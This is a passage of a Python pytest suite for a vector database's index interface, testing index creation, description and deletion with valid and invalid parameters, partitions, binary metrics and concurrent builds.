self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
        target: test index with an unsupported index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
        target: test index with invalid index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
        target: test index with an invalid index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
        method: create an index using an index name already created by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
        target: test index on one field with different names, where the number of names equals the maximum supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
        target: test index on one field with different names, where the number of names exceeds the maximum supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
        method: create indexes by `index` on two collections, drop one of them, and assert the other index is left
        expected: only the dropped collection loses its index; the other one remains
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
        target: test create index interface when the collection name does not exist
        method: create an index using a collection name that does not exist
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
        method: create the index again after it has been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after the first index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after the first index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
        target: test create index interface when the collection name does not exist
        method: create an index using a collection name that does not exist
        expected: return code not equal to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
        target: test create index interface when there are no vectors in the collection, and that this does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
        method: create the index again after it has been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after the first index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
        target: test drop index interface when the collection name does not exist
        method: drop the index using a collection name that does not exist
        expected: return code not equal to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
        method: create a collection and drop the index without creating one
        expected: return code not equal to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
        method: create a collection and drop the index without creating one
        expected: return code not equal to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD")
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
logging.getLogger().info(search_param)
res = connect.search(binary_collection, query, search_params=search_param)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
    ******************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it, create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
